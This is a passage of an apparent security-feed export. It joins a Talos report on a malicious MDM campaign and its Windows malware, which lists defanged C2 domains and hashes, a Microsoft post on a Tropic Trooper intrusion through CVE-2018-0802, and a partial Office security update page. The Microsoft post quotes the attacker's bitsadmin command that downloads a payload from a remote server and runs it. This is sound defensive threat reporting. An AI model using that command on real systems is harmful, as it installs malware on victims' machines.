\n**wpitcher[.]com** \n \nThis domain initially used nameservers related to the Indian company MantraGrid, an India-based cloud platform that shows another link to an Indian actor by using this as one of the original MDM domains we identified. \n \n**ios-certificate-update.com** \n \nThis domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was using a bulletproof hosting platform in Panama. \n \nFinally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>) which shows similar URI structuring, as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are Indian-based because Urdu is a dialect primarily spoken in India and Pakistan. With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime \u2014 a popular app for Muslims that alerts them to complete their daily prayers. \n \nWith all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group. \n \n\n\n## Links with Windows-targeted campaigns\n\n \nTalos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems using the same infrastructure as the malicious app mentioned in our previous article, techwach.com. \n \nThe sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload from the following page: \n \n\n\n * hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php\n \nWe know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to get information on the infected device (username and hostname), send this information and retrieve an additional PE32 file if the operator estimates that the targeted system is relevant. \n \nWe found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic. \n \nHere are the Delphi samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com\n \nHere are the VisualBasic samples: \n \n\n\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/ \nec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/\nSome of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps. \n \nAdditionally, we identified the infection vector of one of the Windows malware. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary of the previously mentioned list. \n \nFinally, one of the VisualBasic binary was bundled in a msiexec file with this following decoy document: \n\n\n[](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>)\n\n \nThis decoy document is using a news story image found on the India Today newspaper website [here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>), which is describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic. \n \n\n\n## Conclusion\n\n \nSince researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports Apple iOS and Windows platforms. \n \nThis actor is likely located in India, given what we see in the technical elements. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time. \n \nThe use of a malicious MDM is convenient and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area. \n \nBecause enrollment into the MDM requires user interaction and acceptance, it is crucial that they are aware of this type of threat and the dangers it can pose to their data and privacy. \n \nTalos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate. \n \n\n\n## Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n\n\n[](<https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s1600/image6.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on[ ](<https://www.snort.org/products>)[Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n \niOS Applications \n \n\n\n * 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa\n * e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa\n * bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa\n * fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa\n \nMDM Domain: \n \n\n\n * ios-update-whatsapp[.]com\n \nC2 Domains: \n \n\n\n * hytechmart[.]com\n \nPE32 Samples: \n \n\n\n * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1\n * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6\n * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed\n * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b\n * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050\n * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5\n * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d\n * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6\n * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea\n * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7\n * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1\n \nPE32 C2 servers: \n \n\n\n * hxxp://appswonder[.]info\n * hxxp://referfile[.]com\n * hxxp://hiltrox[.]com\n * hxxp://scrollayer[.]com\n * hxxp://twitck[.]com\n * hxxp://scrollayer[.]com\n * hxxp://32player[.]com\n * hxxp://nfinx[.]info\n * hxxp://metclix[.]com/\n * hxxp://capsnit[.]com/\n \nMalicious RTF Samples: \n \n\n\n * a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4\n\n", "modified": "2018-07-25T11:53:23", "published": "2018-07-24T22:24:00", "id": "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/-9jjaXrJwBo/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html", "type": "talosblog", "title": "Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-12-03T23:45:41", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0802"], "description": "Several weeks ago, the Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the attack.\n\nThe attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.\n\nWith the high risk determined for affected machines, [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>) blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.\n\nFinally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had foothold on affected machines, returning machines to normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.\n\n## Investigating alert timelines and process trees\n\nWe discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.\n\n\n\n_Figure 1. Multiple alerts triggered by the attack_\n\nThe first detection related to the attack was fired by a suspicious _EQNEDT32.exe_ behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns. Using [Office 365 ATP](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) Threat Explorer, we found the specific emails that the attackers used to distribute the malicious document.\n\nUsing Windows Defender Security Center, we further investigated the detected executable and found that the attackers used _bitsadmin.exe_ to download and execute a randomly named payload from a remote server:\n \n \n bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\\fY.exe && start %USERPROFILE%\\fY.exe\n\nMachine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used the [process hollowing](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/>) technique to run code in a system process memory.\n\nIn some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs [Antimalware Scan Interface (AMSI)](<https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal>) sensor exposed all the attacker scripts, which we observed to be meant mostly for data exfiltration.\n\n\n\n_Figure 2. Process tree_\n\nUsing the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.\n\n\n\n_Figure 3. Campaign attack chain_\n\n## Device risk calculation and incident prioritization\n\nThe alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure security operations teams can immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.\n\nIn this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.\n\n## Windows Defender ATP-driven conditional access\n\nWhen Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by [Azure Active Directory](<https://azure.microsoft.com/en-us/services/active-directory/>).\n\nThis integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. **[Read more about Conditional access here](<https://techcommunity.microsoft.com/t5/What-s-New/Conditional-access-Ensuring-that-only-secure-users-and-devices/ba-p/292510>)**.\n\n## Signal sharing and threat remediation across Microsoft Threat Protection\n\nThreat signal sharing across Microsoft services through the [Intelligent Security Graph](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) ensures that threat remediation is orchestrated across [Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.\n\nThis threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.\n\nMeanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved. \nWindows Defender ATP, Office 365 ATP, and Azure Active Directory are just someof the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.\n\n## Conclusion\n\nThe new device risk calculation mechanism in [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.\n\nThrough [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>), compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.\n\nTo test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, [**sign up for a free trial**](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n \n\n_**Hadar Feldman** and **Yarden Albeck**_ \n_Windows Defender ATP team_\n\n \n\n \n\n## Indicators of attack (IoCs)\n\n### Command and control IP addresses and URLs:\n\n * 199[.]192[.]23[.]231\n * 45[.]122[.]138 [.]6\n * lovehaytyuio09[.]com\n\n### Files (SHA-256):\n\n * 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)\n * 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)\n * 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)\n * 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)\n\n \n\n \n\n \n\n[](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)\n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).\n\n \n\nThe post [Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "modified": "2018-11-28T21:46:48", "published": "2018-11-28T21:46:48", "id": "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", "type": "mssecure", "title": "Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:47:05", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2016: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of Office 2016 installed on the computer.</p><main role=\"main\"><article itemscope=\"\" itemtype=\"http://schema.org/TechArticle\" role=\"article\"><section applies-to-products=\"[]\" ng-attr-id=\"{{contentSection.meta.id}}\" ng-class=\"{'internal-content': isInternalSection() }\" ng-if=\"typeof(contentSection) !== 'string'\" role=\"region\"><section applies-to-products=\"[]\" ng-attr-id=\"{{contentSection.meta.id}}\" ng-class=\"{'internal-content': isInternalSection() }\" ng-if=\"typeof(contentSection) !== 'string'\"><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>).</p></section></section></article></main></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011262\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=da67f5f5-ae58-401e-8b6a-184860b867e8\" managed-link=\"\">Download the security update KB4011262 for the 32-bit version of Office 2016</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=6fc31285-41a0-47a5-a738-d591cc863519\" managed-link=\"\">Download the security update KB4011262 for the 64-bit version of Office 2016</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322016-kb4011262-fullfile-x64-glb.exe</td><td>607BF4114E10E7A20A6ADB328C083A081F4C219C</td><td>CA3F40EEA153711EFC5C9BA5AC1E49AAB31C495A38C59F57FF3D20557439D8A1</td></tr><tr><td>eqnedt322016-kb4011262-fullfile-x86-glb.exe</td><td>940CCD5E3D1E7AFFFB52B7B4F03DE1F3BBECCEB0</td><td>A760FF51E01B72AFE52D8CD3D90189158E10B31D5DD607ED95154638085E0935</td></tr></tbody></table><h3>File information</h3><p>The English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x86-based versions of Office 2016</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1025</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1026</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1028</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1029</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1030</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1031</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1032</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1035</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1036</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1037</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1038</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1040</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1041</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1042</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1043</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1044</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1045</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1046</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1048</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1049</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1050</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1051</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1053</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1054</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1055</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1057</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1058</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1060</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1061</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1062</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1063</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1066</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1081</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1086</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1087</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2070</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2074</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_3082</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_9242</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>25-Oct-17</td><td>01:26</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x64-based versions of Office 2016</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File 